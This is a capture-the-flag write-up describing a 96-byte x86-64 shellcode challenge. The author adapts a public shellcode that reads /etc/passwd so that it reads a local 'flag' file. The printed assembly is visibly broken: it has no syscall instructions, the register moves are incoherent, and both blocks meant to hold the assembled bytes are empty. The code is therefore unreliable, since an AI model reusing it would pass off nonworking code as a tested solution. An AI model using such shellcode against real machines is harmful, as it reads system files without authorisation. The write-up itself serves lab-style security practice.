FakeCTF - Shellcode 0x1

Jun 18, 2022

2 mins read

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Category: Prog

Creator: HømardBøy

The challenge

When we connect to the challenge, we are prompted to send a linux x86-64 shellcode, with a maximum length of 96 bytes.

The description of the challenge also says we have to display the content of a file called “flag” located in the same folder as the binary.

So basically, what we should do in our shellcode is:

  • push the file name in memory
  • call the OPEN system call to get a handle to the file
  • call the READ system call to read the content
  • call the WRITE system call to display the result

But since I am a bit lazy, I know there are many shellcodes that can be found online and that would read a file (usually /etc/passwd)

So I found this article and chose its second shellcode (why not the first one? I don’t know).


    xor esi, esi
    mul esi

    push rdx    ; '\0'

    mov rcx, 0x6477737361702f63  ; 'c/passwd'
    push rcx

    mov rcx, 0x74652f2f2f2f2f2f  ; '//////et'
    push rcx

    push rsp
    pop rdi

    mov al, 0x2

    push rax
    pop rdi

    push rsp
    pop rsi

    push rdx
    push rdx        ; saving lots of 0s
    push rdx
    push rdx
    pop rax
    mov dx, 0x999

    pop rdi
    inc edi

    push rax
    pop rdx
    pop rax
    inc eax

    pop rax
    mov al, 60

Once assembled, it gives the following shellcode:


We can see the file path split in the shellcode and I just wanted to replace it with the path to the file flag.

I found it interesting that the path used many / to make the string length a multiple of 8 bytes. But here, I needed to read a file in the local directory. So the path I chose was .///////////flag, and it worked!

Final shellcode:


Note: I know I could probably only push one shorter string, like .///flag but in the middle of a CTF, it was just easier to copy the compiled shellcode and edit the path from there, instead of reassembling one.

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